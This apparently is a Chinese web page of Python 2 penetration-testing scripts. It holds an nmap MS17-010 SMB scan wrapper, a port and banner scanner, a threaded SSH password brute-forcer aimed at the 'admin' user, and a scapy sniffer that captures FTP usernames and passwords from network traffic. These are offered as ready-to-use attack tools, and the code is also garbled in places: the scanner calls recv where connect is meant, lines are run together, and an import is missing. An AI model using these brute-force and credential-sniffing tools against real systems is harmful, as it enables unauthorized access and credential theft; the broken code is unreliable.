python常用脚本渗透代码

SMB扫描渗透测试

# coding=utf-8 #!/usr/bin/python import subprocess

import optparse

def smb_scan(ip):

result = subprocess.call(['nmap', '--script=smb-vuln-ms17-010', ip], shell=False)

return result

def main():

parser = optparse.OptionParser('usage%prog ' + '-P ')

parser.add_option('-P', dest='arg', type='string',

help='specify target ip segment/eg:(192.168.1.)')

(options, args) = parser.parse_args()

ip = options.arg

result = smb_scan(ip) if __name__ == '__main__':

main()

主机端口服务判断渗透测试

# coding=utf-8 #!/usr/bin/python import optparse

from socket import *

def sockerconn(host, port):

try:

client = socket(AF_INET, SOCK_STREAM)

client.recv((host, port))

client.send('hellopython\\r\\n')

results = client.recv(100)

print str(port) + \" tcp open\"

print str(results)

client.close()

except:

print str(port) + \" tcp close\" def portscan(host, ports):

setdefaulttimeout(1)

print \"scan results for \" + host

for port in ports:

print '*'*40

print \"scanning port: \" + port

sockerconn(host, int(port))

def main():

paeser = optparse.OptionParser('usage %prog ' + '-H -p |')

paeser.add_option('-H', dest='host', type='string', help='specify target host')

paeser.add_option('-p', dest='port', type='string', help='specify target port(s) separated by comma')

(options, args) = paeser.parse_args()

host = options.host

port = str(options.port).split(',')

portscan(host, port)

if __name__ == '__main__':

main()

远程ssh访问渗透测试

# coding=utf-8 #!/usr/bin/python import optparse

import paramiko

from threading import Thread

def connect(host, user, pwd):

try:

ssh=paramiko.SSHClient()

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

ssh.connect(hostname=host, username=user, password=pwd, timeout=5)

ssh.close()

print 'brute success！' + ',host IP: ' + host + 'username： ' + user

print 'password:' + pwd

except:

pass def ssh_brute(host, passwd_dict):

print 'brute is running: '+host

user = 'admin'

paramiko.util.log_to_file(\"sshconn.log@\" + host)

passwords = open(passwd_dict)

for password in passwords:

pwd = password.strip('\\n')

t = Thread(target=connect, args=(host, user, pwd))

t.start()

def main():

parser = optparse.OptionParser('usage %prog ' + '-H -u -p ')

parser.add_option('-H', dest='host', type='string', help='specify host to brute')

parser.add_option('-p', dest='passwd_dict', type='string', help='specify passwords dictionary to brute')

(options, args) = parser.parse_args()

host = options.host

passwd_dict = options.passwd_dict

ssh_brute(host, passwd_dict) if __name__ == '__main__':

main()

网络协议渗透测试

# coding=utf-8 #!/usr/bin/python

from scapy.all import *

import optparse def ftpsniff(pkt):

dest = pkt.getlayer(IP)

raw = pkt.sprintf('%Raw.load%')

user = re.findall('(?i)USER (.*)', raw)

pswd = re.findall('(?i)PASS (.*)', raw)

if user:

print 'FTP Login to ' + str(dest[0])

print 'Username: ' + str(user[0])

elif pswd:

print 'Password: ' + str(pswd[0]) def ftpsniffmain():

parser = optparse.OptionParser('usage %prog ' + '-i ')

parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')

(options, args) = parser.parse_args()

if options.interface == None:

print parser.usage

exit(0)

else:

conf.iface = options.interface

try:

print 'FTP sniffer is running'

sniff(filter='tcp port 21', prn=ftpsniff)

except KeyboardInterrupt:

exit(0)

if __name__ == '__main__':

ftpsniffmain()